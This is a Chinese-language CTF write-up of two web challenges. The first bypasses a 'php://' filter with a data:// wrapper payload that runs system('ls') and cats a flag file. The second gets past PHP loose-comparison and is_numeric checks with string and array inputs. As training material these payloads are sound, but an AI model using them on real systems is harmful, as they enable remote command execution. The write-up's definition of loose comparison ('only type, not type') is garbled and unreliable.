攻防世界-Web题目2(弱比较、php伪协议)

目录

Web_php_include

1、题目

2、知识点

3、思路

simple_php

4、题目

5、知识点

6、思路

Web_php_include

1、题目
2、知识点

php伪协议

3、思路

审计源代码

需要我们上传一个page参数,但是对参数内容进行过滤,

page=str_replace("php://", "", page); 意思是将php://替换成空,

看到这个,联想到使用php伪协议,既然这个协议被过滤,那就用其他协议

使用data://协议,

data://text/plain,<?php phpinfo();?>

payload:

/?page=data://text/plain,<?php%20system("ls");?>

?page=data://text/plain,<?php%20system("cat%20fl4gisisish3r3.php");?>

右键查看源代码得到flag

flag:

ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}


simple_php

4、题目
5、知识点

弱比较,数组绕过

6、思路

审计源代码,需要我们GET上传a,b两个变量,

if(a==0 and a) 意思是a与0进行弱比较且不等于0,否则条件不成立

弱比较:只比较类型,不比较类型,也就是我们可以使a=字符串,字符串与0进行弱比较时会进行类型转化

payload:?a="sss"
if(is_numeric($b)){ exit(); } 意思是如果b是数字则结束程序

if($b>1234) b需要大于1234

可以采用数组进行绕过,或者数字加字符串的形式

b[]=1234 或者b=2222a

完整payload:?a="sss"&b=2222a

得到payload:Cyberpeace{647E37C7627CC3E4019EC69324F66C7C}


这篇文章就先写到这里了,哪里不懂的或者哪里不足的欢迎指出

相关推荐
lubiii_10 小时前
SQLMap常用命令指南(参数及其用法)
sql·web安全·网络安全
下页、再停留12 小时前
【ThinkPHP6系列学习-5】获取变量
php
kaikaile199518 小时前
PHP计算过去一定时间段内日期范围函数
android·开发语言·php
zhangfeng113321 小时前
fastadmin 关闭日志 /runtime/log 这里的日志 关闭
php
19岁开始学习1 天前
PHP操作elasticsearch7.8
elasticsearch·jenkins·php
Yyyy4821 天前
Ansible Role修改IP地址与主机名
linux·服务器·php
JaguarJack1 天前
多进程环境中解决 PHP 文件系统锁定问题指南
后端·php
风语者日志1 天前
CTF攻防世界WEB精选基础入门:command_execution
web安全·网络安全·ctf·小白入门
witkey_ak98961 天前
网安面试题收集(2)
web安全
white-persist2 天前
XXE 注入漏洞全解析:从原理到实战
开发语言·前端·网络·安全·web安全·网络安全·信息可视化